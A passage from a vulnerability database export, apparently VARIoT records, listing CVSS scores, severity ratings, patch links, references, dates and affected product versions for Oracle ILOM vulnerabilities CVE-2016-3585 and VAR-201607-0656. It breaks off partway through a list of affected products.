baseSeverity: "HIGH", confidentialityImpact: "HIGH", exploitabilityScore: 2.2, id: "CVE-2016-3585", impactScore: 5.2, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-3585", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-3585", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-777", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-92404", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-3585", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality and integrity via vectors related to Emulex. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in Integrated Lights Out Manager. \nThe vulnerability can be exploited over the 'HTTPS' protocol. The 'Emulex' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2", sources: [ { db: "NVD", id: "CVE-2016-3585", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-3585", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91952", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003872", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-777", trust: 0.7, }, { db: "VULHUB", id: "VHN-92404", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-3585", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, id: "VAR-201607-0174", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-92404", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:16:55.844000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63137", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3585", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-3585", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91952", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3585", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3585", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-92404", }, { db: "VULMON", id: "CVE-2016-3585", }, { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, { db: "JVNDB", id: "JVNDB-2016-003872", }, { db: "CNNVD", id: "CNNVD-201607-777", }, { db: "NVD", id: "CVE-2016-3585", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-92404", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-3585", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91952", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003872", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-777", }, { date: "2016-07-21T10:14:24.237000", db: "NVD", id: "CVE-2016-3585", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-92404", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-3585", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91952", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003872", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-777", }, { date: "2024-11-21T02:50:19.770000", db: "NVD", id: "CVE-2016-3585", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Emulex Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003872", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91952", }, ], trust: 0.6, }, }
var-201607-0656
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect availability via vectors related to Console Redirection. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'HTTP' protocol. The 'Console Redirection' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker can exploit this vulnerability to cause a denial of service and affect data availability
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0656", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", 